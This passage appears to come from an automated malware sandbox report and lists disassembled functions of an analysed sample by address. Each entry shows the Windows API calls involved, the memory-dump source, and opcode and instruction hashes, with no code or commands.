                                            • Opcode Fuzzy Hash: 801b9f6ac65b810c5ae3d5e529181634e6dcb3bb6c5b448778802922bd1995e4
                                            • Instruction Fuzzy Hash: 4331A7B9D042589FCF10CFA9E980AEEFBF0BB19310F24902AE814B7210C335A944CF64
                                            Function 09987208 Relevance: 1.6, APIs: 1, Instructions: 94threadCOMMON
                                            Download Yara Rule
                                            APIs
                                            • Wow64SetThreadContext.KERNEL32(?,?), ref: 099872B7
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2191424250.0000000009980000.00000040.00000800.00020000.00000000.sdmp, Offset: 09980000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_9980000_file.jbxd
                                            Similarity
                                            • API ID: ContextThreadWow64
                                            • String ID:
                                            • API String ID: 983334009-0
                                            • Opcode ID: 0e3856c738e90e03bfbca38b311e36586e8beaf846d542b53894b6292d87e94d
                                            • Instruction ID: 4a87cd5a5951ba7f2db1cf7388035e179e9bdb1bf3e8e7907b7d4c918910a308
                                            • Opcode Fuzzy Hash: 0e3856c738e90e03bfbca38b311e36586e8beaf846d542b53894b6292d87e94d
                                            • Instruction Fuzzy Hash: 3A31A9B5D012589FCB10DFAAD984AEEBBF5BB59310F24802AE418B7240C738A945CF64
                                            Function 09983EC8 Relevance: 1.6, APIs: 1, Instructions: 88windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • PostMessageW.USER32(?,?,?,00000000), ref: 0998B87B
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2191424250.0000000009980000.00000040.00000800.00020000.00000000.sdmp, Offset: 09980000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_9980000_file.jbxd
                                            Similarity
                                            • API ID: MessagePost
                                            • String ID:
                                            • API String ID: 410705778-0
                                            • Opcode ID: f06ffd5c3a898f520f76daae6f0b2adab427b269404e2c6e8d9f9478fa7e8823
                                            • Instruction ID: bf3a75706809d779edf298f23828c12c2908783e2f1e9e1594dc5eeac0f3c91e
                                            • Opcode Fuzzy Hash: f06ffd5c3a898f520f76daae6f0b2adab427b269404e2c6e8d9f9478fa7e8823
                                            • Instruction Fuzzy Hash: 763177B9D042589FCF10CFA9D984A9EFBF4EB19310F14902AE818BB310D375A945CFA4
                                            Function 0998B7D9 Relevance: 1.6, APIs: 1, Instructions: 87windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • PostMessageW.USER32(?,?,?,00000000), ref: 0998B87B
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2191424250.0000000009980000.00000040.00000800.00020000.00000000.sdmp, Offset: 09980000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_9980000_file.jbxd
                                            Similarity
                                            • API ID: MessagePost
                                            • String ID:
                                            • API String ID: 410705778-0
                                            • Opcode ID: bcfafc538888c3a04b708d1977db777a9c3b8104a36c7254321bf7d4445c7167
                                            • Instruction ID: 509bc778867c0aca7b3c6f85ab81c19e40d7f1e004c8872a49060fce3b7210b0
                                            • Opcode Fuzzy Hash: bcfafc538888c3a04b708d1977db777a9c3b8104a36c7254321bf7d4445c7167
                                            • Instruction Fuzzy Hash: 983177B9D052589FCB14CFA9D984A9EFBF4AB59310F14902AE818BB310D335A9458F64
                                            Function 028EA589 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                            Download Yara Rule
                                            APIs
                                            • OutputDebugStringW.KERNELBASE(?), ref: 028EA62A
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2185563960.00000000028E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_28e0000_file.jbxd
                                            Similarity
                                            • API ID: DebugOutputString
                                            • String ID:
                                            • API String ID: 1166629820-0
                                            • Opcode ID: f1d432386bfb3f999fa443e89a731d5e6006ef005b8cd50a2520a99a7f678d48
                                            • Instruction ID: 295d78850a234fa3540bbacb1bf92b3bc72a66cdb3ad64411a35c38e78be3867
                                            • Opcode Fuzzy Hash: f1d432386bfb3f999fa443e89a731d5e6006ef005b8cd50a2520a99a7f678d48
                                            • Instruction Fuzzy Hash: A531A9B8D002599FCB14CFA9E984ADEFBF1AB49314F14806AE818B7221D735A945CF64
                                            Function 028EA590 Relevance: 1.6, APIs: 1, Instructions: 78COMMON
                                            Download Yara Rule
                                            APIs
                                            • OutputDebugStringW.KERNELBASE(?), ref: 028EA62A
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2185563960.00000000028E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_28e0000_file.jbxd
                                            Similarity
                                            • API ID: DebugOutputString
                                            • String ID:
                                            • API String ID: 1166629820-0
                                            • Opcode ID: f25271e72466302fdd3837b5d0f9d1de1ad50d4f8b633d745b41b2fc4e676880
                                            • Instruction ID: 49540f2606fb48e11d80cb580fb7da47e9890f77829462cba6a533b288eeee30
                                            • Opcode Fuzzy Hash: f25271e72466302fdd3837b5d0f9d1de1ad50d4f8b633d745b41b2fc4e676880
                                            • Instruction Fuzzy Hash: 2431A9B8D002189FCF14CFA9D984A9EFBF5AB49314F14906AE818B7321D735A945CF64
                                            Function 029A57E0 Relevance: 1.6, APIs: 1, Instructions: 76COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetModuleHandleW.KERNELBASE(?), ref: 029A5872
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2185889999.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_29a0000_file.jbxd
                                            Similarity
                                            • API ID: HandleModule
                                            • String ID:
                                            • API String ID: 4139908857-0
                                            • Opcode ID: 6e1b3261a9d2b15bfa0831649092a43490647934e5d1afe6a139ae81b8b56c2f
                                            • Instruction ID: ee6b899f3238055c4c0c227f691f1165c10cef70cd1816743fcb7ca49066bdb8
                                            • Opcode Fuzzy Hash: 6e1b3261a9d2b15bfa0831649092a43490647934e5d1afe6a139ae81b8b56c2f
                                            • Instruction Fuzzy Hash: 463188B5D002599FCB14CFAAD984ADEFBF5AB49314F14906AE818B7320D334A945CFA4
                                            Function 09986CD8 Relevance: 1.6, APIs: 1, Instructions: 75threadCOMMON
                                            Download Yara Rule
                                            APIs
                                            • ResumeThread.KERNELBASE(?), ref: 09986D5E
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2191424250.0000000009980000.00000040.00000800.00020000.00000000.sdmp, Offset: 09980000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_9980000_file.jbxd
                                            Similarity
                                            • API ID: ResumeThread
                                            • String ID:
                                            • API String ID: 947044025-0
                                            • Opcode ID: d9964586a78b34f42f98f21a1fef59076a5ba78f8553b23c47df682750e31c37
                                            • Instruction ID: ba5b4e9e08f86de6e6a226034d20f876dee2584d6e0722eee875dcac0ea6a5dd
                                            • Opcode Fuzzy Hash: d9964586a78b34f42f98f21a1fef59076a5ba78f8553b23c47df682750e31c37
                                            • Instruction Fuzzy Hash: 9331B8B4D112589FCF14CFA9E985AAEFBB5FB59310F14942AE819B7200C735A901CF64
                                            Function 09986CE0 Relevance: 1.6, APIs: 1, Instructions: 73threadCOMMON
                                            Download Yara Rule
                                            APIs
                                            • ResumeThread.KERNELBASE(?), ref: 09986D5E
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2191424250.0000000009980000.00000040.00000800.00020000.00000000.sdmp, Offset: 09980000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_9980000_file.jbxd
                                            Similarity
                                            • API ID: ResumeThread
                                            • String ID:
                                            • API String ID: 947044025-0
                                            • Opcode ID: 4f05189020e873b38315056b1056b80972731b75a97a626c508798a9cc7a9331
                                            • Instruction ID: 56cf38aeaae34f76676d0f27d518f3b6531b948f3da03a3687c0521a9dc7d971
                                            • Opcode Fuzzy Hash: 4f05189020e873b38315056b1056b80972731b75a97a626c508798a9cc7a9331
                                            • Instruction Fuzzy Hash: 8131C9B4D012189FCF10CFA9D984AAEFBB4FB49310F14942AE819B7200CB35A901CFA4
                                            Function 0A0A89F8 Relevance: 1.4, Strings: 1, Instructions: 179COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2191637289.000000000A0A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A0A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_a0a0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: d8hq
                                            • API String ID: 0-895396709
                                            • Opcode ID: 8e41c98316c937cf42e90350ddca8ae0b94043ca23b6667fb7cb52bb8feace72
                                            • Instruction ID: 46ae8b77a30799f7d3db284edf307429fe1b53779763c28bb5121d087e67814d
                                            • Opcode Fuzzy Hash: 8e41c98316c937cf42e90350ddca8ae0b94043ca23b6667fb7cb52bb8feace72
                                            • Instruction Fuzzy Hash: BF616835B10118DFCB54DFA8D858AAE7BF2EF98711F148469E902AB391DB709C45CFA0
                                            Function 0A0AF2D0 Relevance: 1.4, Strings: 1, Instructions: 178COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2191637289.000000000A0A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A0A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_a0a0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Hgq
                                            • API String ID: 0-2103768809
                                            • Opcode ID: 9242627ac384705ab17119354fdb4e01e4ff316ca891855f93a372fc83163df2
                                            • Instruction ID: c4cb5bf473140ba12eac117cfac5c6b2d57ae56f95c0d8d9133434c1fab74287
                                            • Opcode Fuzzy Hash: 9242627ac384705ab17119354fdb4e01e4ff316ca891855f93a372fc83163df2
                                            • Instruction Fuzzy Hash: BD61B135A006098FCB55DFA8C9509AE7BF2EF89310F1580AAD806EB361DB35DD46CF91
                                            Function 0A0A8EE0 Relevance: 1.4, Strings: 1, Instructions: 116COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2191637289.000000000A0A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A0A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_a0a0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (ocq
                                            • API String ID: 0-1855696158
                                            • Opcode ID: 506df2f853df8819a83a26166c50f425c69c49c4970eaff42c969d0ab25237e0
                                            • Instruction ID: 1ed048ce7800d2b843c1dd233a893aeb765c168244ec521b3d22647adc33379b
                                            • Opcode Fuzzy Hash: 506df2f853df8819a83a26166c50f425c69c49c4970eaff42c969d0ab25237e0
                                            • Instruction Fuzzy Hash: E331FB71B1060F8FCB68CAE9C85456FBBE3AFE0340B06C529D115C7254EB30E9598791
                                            Function 028EA681 Relevance: 1.3, APIs: 1, Instructions: 75COMMON
                                            Download Yara Rule
                                            APIs
                                            • CloseHandle.KERNELBASE(?), ref: 028EA706
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2185563960.00000000028E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_28e0000_file.jbxd
                                            Similarity
                                            • API ID: CloseHandle
                                            • String ID:
                                            • API String ID: 2962429428-0
                                            • Opcode ID: 8fb01b536813090f1fd8336d999b63a57ef179f774f22097113415611781fb9d
                                            • Instruction ID: 73c63e50e92db920d71b4a9da27191de907c68e318ec0d90cff77c34e83960e1
                                            • Opcode Fuzzy Hash: 8fb01b536813090f1fd8336d999b63a57ef179f774f22097113415611781fb9d
                                            • Instruction Fuzzy Hash: F031CCB9D002189FCF10CFA9D885AEEFBF4EB09320F24905AE815B3201C335A945CFA4
                                            Function 028EA688 Relevance: 1.3, APIs: 1, Instructions: 70COMMON
                                            Download Yara Rule
                                            APIs
                                            • CloseHandle.KERNELBASE(?), ref: 028EA706
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2185563960.00000000028E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_28e0000_file.jbxd
                                            Similarity
                                            • API ID: CloseHandle
                                            • String ID:
                                            • API String ID: 2962429428-0
                                            • Opcode ID: 7449cc0a1a520b0f7b50d61b03f42f42f08dbc9095af95b691bc613426779a2f
                                            • Instruction ID: b9fd4f4a170beddd83784b31260194ba8356631c26f19c784ac2371995adf66d
                                            • Opcode Fuzzy Hash: 7449cc0a1a520b0f7b50d61b03f42f42f08dbc9095af95b691bc613426779a2f
                                            • Instruction Fuzzy Hash: 7021CCB9D042189FCF10CFA9D985AEEFBF4AB09310F14905AE815B3310C375A944CF64
                                            Function 0A0A5920 Relevance: 1.3, Strings: 1, Instructions: 58COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2191637289.000000000A0A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A0A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_a0a0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Tecq
                                            • API String ID: 0-1122318316
                                            • Opcode ID: 4f22ccb179e61290323a5676eceeefe4da06562eb9cdaafaed75de05dc6fcc0d
                                            • Instruction ID: 65a3e15fd744d9f7d282515aaea81391ba297ad99591634445e5331db3e985cd
                                            • Opcode Fuzzy Hash: 4f22ccb179e61290323a5676eceeefe4da06562eb9cdaafaed75de05dc6fcc0d
                                            • Instruction Fuzzy Hash: 20114F75B0020D8BCF54EBB999005FFB6F6BB98310B20407AC509EB244EB759E01CBA1
                                            Function 0A0A3D40 Relevance: .8, Instructions: 806COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2191637289.000000000A0A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A0A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_a0a0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2d9520b48b8e101e744969c914fc5c20caac450a075c7e9e46adb7cabd6f894d
                                            • Instruction ID: 56f8d483e7da8a5cf214d92e3c51274564f42272db3e2d36365531e6433d7881
                                            • Opcode Fuzzy Hash: 2d9520b48b8e101e744969c914fc5c20caac450a075c7e9e46adb7cabd6f894d
                                            • Instruction Fuzzy Hash: 6B727F75D00B89CBCBB89FF498887AD7AE5AB51340F50492FC0BACB285D7769482CF45
                                            Function 0A0A3D80 Relevance: .5, Instructions: 451COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2191637289.000000000A0A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A0A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_a0a0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3b70aeed4ad3d783bfaf4c389e160f9fdfe49d3ff1f941a828075b178ae2aa18
                                            • Instruction ID: 2a71083e52a03ef38a168c35df95098dbf05dc58ebb0eba280edac4bd29b1c99
                                            • Opcode Fuzzy Hash: 3b70aeed4ad3d783bfaf4c389e160f9fdfe49d3ff1f941a828075b178ae2aa18
                                            • Instruction Fuzzy Hash: 47127EB5D05F86CAD7B84FE4988839EB6D4AB11340F604D1BC0FACB259C77690878F89
                                            Function 0A0A08B3 Relevance: .2, Instructions: 175COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2191637289.000000000A0A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A0A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_a0a0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4809af2524ee4e77ad475ad32edb96c60876ab59fd33e8f2c8263c924d95a3ef
                                            • Instruction ID: b6b1088c93e0888208ed276e17a853ee12d07737f45e18399ed1c3904b375f41
                                            • Opcode Fuzzy Hash: 4809af2524ee4e77ad475ad32edb96c60876ab59fd33e8f2c8263c924d95a3ef
                                            • Instruction Fuzzy Hash: CC718E78A01208EFDB55DFA8D494DAEBBB6BF49324B114498F901AB361CB31AC81CF50
                                            Function 0A0A35A0 Relevance: .2, Instructions: 166COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2191637289.000000000A0A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A0A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_a0a0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 66a2905b4ce09e5e6c6b032a7fe67491461f65597f2009b2c55c5843f48ce5de
                                            • Instruction ID: 7c7e2f149ac49e9487046519bbdfe4981e418b510d856bb8c8c425905a01272f
                                            • Opcode Fuzzy Hash: 66a2905b4ce09e5e6c6b032a7fe67491461f65597f2009b2c55c5843f48ce5de
                                            • Instruction Fuzzy Hash: F4514C74A102089FDB54DFA9C594A9DB7F6EF88310F658069E416EB3A1CB31EC05CF61
                                            Function 0A0A2E68 Relevance: .2, Instructions: 155COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2191637289.000000000A0A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A0A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_a0a0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6931c5e5bdaaf402bdef07e8820cc5db7ed49913e4c01c5549739269bd0f67cb
                                            • Instruction ID: 3ace5f5effd3e338939746cad32867f2a5d6eddfed9b39dc4ffe7bfa950c1f82
                                            • Opcode Fuzzy Hash: 6931c5e5bdaaf402bdef07e8820cc5db7ed49913e4c01c5549739269bd0f67cb
                                            • Instruction Fuzzy Hash: A04121322093885FCB1297A4A8116EA7FA5DF96211F0480BBF44DCB553C67AC89787E2
                                            Function 0A0A0DA0 Relevance: .1, Instructions: 135COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2191637289.000000000A0A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A0A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_a0a0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 61b14b69ad81614b13b0c44e23760f2dc2eb012474d217b84b337d3872ecb894
                                            • Instruction ID: c745a62e1118142c4cbc69154247448313457410fe52d48e92aba961233de6d5
                                            • Opcode Fuzzy Hash: 61b14b69ad81614b13b0c44e23760f2dc2eb012474d217b84b337d3872ecb894
                                            • Instruction Fuzzy Hash: FD51FA75A1060A9FCB04DFA8D5848DDF7B5FF89300B10C25AE915AB314EB31AE55CF90
                                            Function 0A0A8E11 Relevance: .1, Instructions: 126COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2191637289.000000000A0A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A0A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_a0a0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e3ce89affa08b2bc0bb16fa729d89f5b0726268c998f034cc725a1f52620e44f
                                            • Instruction ID: 15002d6107a150d8ec7bc37983be9bb6e1cab9f34ca0e2446dee144e28faf7bd
                                            • Opcode Fuzzy Hash: e3ce89affa08b2bc0bb16fa729d89f5b0726268c998f034cc725a1f52620e44f
                                            • Instruction Fuzzy Hash: 1341D431B0011ACFCB64DFA8C89496EBBF2EF94350F05C46AE405D7311DB30E8498BA1
                                            Function 0A0A0D90 Relevance: .1, Instructions: 126COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2191637289.000000000A0A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A0A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_a0a0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d871a8a20addc005a54db381ae4f9fc091ab8fe6db28ecca1f15a56a223e48a1
                                            • Instruction ID: 5539b342a2ced96369d43805cc7da3f29792b3e32003f910d3c4277920c19f4d
                                            • Opcode Fuzzy Hash: d871a8a20addc005a54db381ae4f9fc091ab8fe6db28ecca1f15a56a223e48a1
                                            • Instruction Fuzzy Hash: 6A510875A1060A8FCB04DFA8D9848DDFBB5FF89300B11C25AE515AB325EB31AE45CF90
                                            Function 0A0A92BF Relevance: .1, Instructions: 117COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2191637289.000000000A0A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A0A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_a0a0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 602de1dfda668883d7f3b819b0e93d4efb05d0da9e2ea8c0b86f2176ba8017d4
                                            • Instruction ID: e395fd4b3985d88760b4d25ca8988f15e2b92e521542661418989425d29a5858
                                            • Opcode Fuzzy Hash: 602de1dfda668883d7f3b819b0e93d4efb05d0da9e2ea8c0b86f2176ba8017d4
                                            • Instruction Fuzzy Hash: D64146717001299FCF459FA4D885AAEBBA6FF88340F148429E80697294DB38DD92CFD0
                                            Function 0A0A2144 Relevance: .1, Instructions: 81COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2191637289.000000000A0A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A0A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_a0a0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9210b0ee5a6604317dd04b26ca976946cb4825957ae8682e63a5c0ce497b4afc
                                            • Instruction ID: 29b45084df0527f16e93a5797fe928476a6d17c889af718432a0b5e3fcaab650
                                            • Opcode Fuzzy Hash: 9210b0ee5a6604317dd04b26ca976946cb4825957ae8682e63a5c0ce497b4afc
                                            • Instruction Fuzzy Hash: 9F219A75B0021A9BCB55EBB898584BF7BB7EBC82107158929E426D7381EF3499058760
                                            Function 0A0AF8C8 Relevance: .1, Instructions: 79COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2191637289.000000000A0A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A0A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_a0a0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ee0ba63581caff8a15dfd5a186d1badcc529fd57d9e1dd6e04403150845558ce
                                            • Instruction ID: 5689e0b9db98f6a3a4350f462d89d85cde38ff9681b775611bd116231fff1786
                                            • Opcode Fuzzy Hash: ee0ba63581caff8a15dfd5a186d1badcc529fd57d9e1dd6e04403150845558ce
                                            • Instruction Fuzzy Hash: D1214336B10210AFEB24CA69C8916BE77E7EBC4314B258029D54BD3364CA34E981CB61
                                            Function 0A0AEC38 Relevance: .1, Instructions: 76COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2191637289.000000000A0A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A0A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_a0a0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 78b1221d9f091aa383cfefdc1b826f83cdd6d925b162d28d4acdb295c77a7574
                                            • Instruction ID: b4713c941b35bd3b189b6fcd734ba14d0cbbf09151c0ef39ac1ff9f3aa4c1ea5
                                            • Opcode Fuzzy Hash: 78b1221d9f091aa383cfefdc1b826f83cdd6d925b162d28d4acdb295c77a7574
                                            • Instruction Fuzzy Hash: 0221F232A052698FDB50DFECDC90A6EB7E5FF95300F1A44BAD408AB352CA31AC01C760
                                            Function 00E7D3EC Relevance: .1, Instructions: 75COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2184925018.0000000000E7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E7D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_e7d000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0403aca6e483f1931b25b94e1a180e23f7898b48bce127bed9073e583b711ad1
                                            • Instruction ID: 55f60b83f2ebcf5adeadf9057ab9f9d1cbab25bdf5e8c229ee425d35eb04b911
                                            • Opcode Fuzzy Hash: 0403aca6e483f1931b25b94e1a180e23f7898b48bce127bed9073e583b711ad1
                                            • Instruction Fuzzy Hash: CA21F1B2508204EFCB15DF14D9C0B26BF75FF98324F24C569E90D2B246D336E816C6A1
                                            Function 00E8D01C Relevance: .1, Instructions: 72COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2185024864.0000000000E8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E8D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_e8d000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 36284f0683ed4a2a60d3da336b134b48d174c358e7ea79ebe8a8f1e75c670e38
                                            • Instruction ID: 6177d94cc29d51bb4392b6609e28e121e59bd63b9892f5a971882d88202010e5
                                            • Opcode Fuzzy Hash: 36284f0683ed4a2a60d3da336b134b48d174c358e7ea79ebe8a8f1e75c670e38
                                            • Instruction Fuzzy Hash: D521F275608204DFDB15EF14DD84B26BB66EB88328F24C96DD80E5B2D6C33AD807CB61
                                            Function 00E8D1D4 Relevance: .1, Instructions: 72COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2185024864.0000000000E8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E8D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_e8d000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7424d7ce61f886bf46eb75f4bbdc6334a2aa1f2c17f77f0d21ea859d9241d921
                                            • Instruction ID: 4a70bf8dfcbcba0ed1da29de356a1dc229ee815cf0f16224c87a94072ea61cf3
                                            • Opcode Fuzzy Hash: 7424d7ce61f886bf46eb75f4bbdc6334a2aa1f2c17f77f0d21ea859d9241d921
                                            • Instruction Fuzzy Hash: 9921F571508204DFDB05EF54D9C0B26BB65FB84328F24C56DD80D6B2A6C336D806CB61
                                            Function 0A0A0790 Relevance: .1, Instructions: 68COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2191637289.000000000A0A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A0A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_a0a0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b1359262777f6e91f3641aa4d28147d142ccf1ca45af7a2f38de08d5642655e9
                                            • Instruction ID: f4981e379bc7e41486c98293127fb36dc0deec3c491e84d4e966672c5fcd2bd1
                                            • Opcode Fuzzy Hash: b1359262777f6e91f3641aa4d28147d142ccf1ca45af7a2f38de08d5642655e9
                                            • Instruction Fuzzy Hash: 13216A35B002189FCBA08E59D5C0A6E73EAABD8A21F00442EEA4687750CB71EC41CFA1
                                            Function 0A0A0783 Relevance: .1, Instructions: 65COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2191637289.000000000A0A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A0A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_a0a0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e832d04a729203f513587865385ad7f4f7d06883d196fdece40741bc09254924
                                            • Instruction ID: 1f51cae7a1e9bbd9c6a6aee78837158b4a8c70928df927162c723ea380d1cb4b
                                            • Opcode Fuzzy Hash: e832d04a729203f513587865385ad7f4f7d06883d196fdece40741bc09254924
                                            • Instruction Fuzzy Hash: DC216A35B002189FCBA08E55D4C0AAA77F6AF98621B05446EE94687761C731AC41CF61
                                            Function 00E8D005 Relevance: .1, Instructions: 62COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2185024864.0000000000E8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E8D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_e8d000_file.jbxd
